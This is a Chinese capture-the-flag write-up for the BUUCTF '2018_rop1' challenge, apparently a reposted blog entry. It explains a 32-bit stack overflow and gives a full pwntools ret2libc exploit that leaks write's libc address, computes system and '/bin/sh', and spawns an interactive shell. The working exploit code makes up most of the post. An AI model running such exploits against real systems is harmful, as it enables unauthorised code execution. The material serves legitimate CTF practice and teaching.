BUUCTF--铁人三项(第五赛区)_2018_rop1
2024-01-08 14:18:30
这题是一题标准的rop。先简单查看下保护:
32位程序,黑盒测试下效果:
一上来就是输入,然后结尾会输出Hello,World.看看IDA中具体逻辑如何:
漏洞点主要在vulnerable_function()函数中。老常规栈溢出了。做这种题的思路:
1.第一次布局通过题目中的write,puts等函数将库函数地址泄露,并能返回到主程序
2.通过计算算出libc基地址进一步得到system地址。
3.找到libc中bin/sh的位置
4.第二次布局就是直接布置rop
exp如下:
#coding=utf-8
from pwn import *
context.log_level='debug'
#p=remote("node3.buuoj.cn",28424)
p=process("./2018_rop")
elf=ELF("./2018_rop")
libc=ELF('/lib/i386-linux-gnu/libc-2.27.so') #here is your libc
vul_addr=elf.sym['main']
write_plt=elf.plt['write']
write_got=elf.got['write']
payload = 'a'*(0x88+0x4)
payload += p32(write_plt)
payload += p32(vul_addr)
payload += p32(1)
payload += p32(write_got)
payload += p32(4)
gdb.attach(p)
p.sendline(payload)
write_addr=u32(p.recv())
print('!!!',hex(write_got))
write_offset=libc.sym['write']
system_offset =libc.sym['system']
binsh_offset =next(libc.search('/bin/sh'))
base_addr = write_addr - write_offset
sys_addr = system_offset + base_addr
bin_addr = binsh_offset + base_addr
payload1 = "a" * 0x88
payload1 += "b"*4
payload1 += p32(sys_addr)+p32(1)+p32(bin_addr)
p.sendline(payload1)
pause()
p.interactive()
我这是打本地的代码,远程的话给了libc用libc,没给libc用LibcSearcher,个人感觉不太好用,很多时候找不到。
文章来源:https://blog.csdn.net/qq_30528603/article/details/135454441
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。 如若内容造成侵权/违法违规/事实不符,请联系我的编程经验分享网邮箱:veading@qq.com进行投诉反馈,一经查实,立即删除!
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。 如若内容造成侵权/违法违规/事实不符,请联系我的编程经验分享网邮箱:veading@qq.com进行投诉反馈,一经查实,立即删除!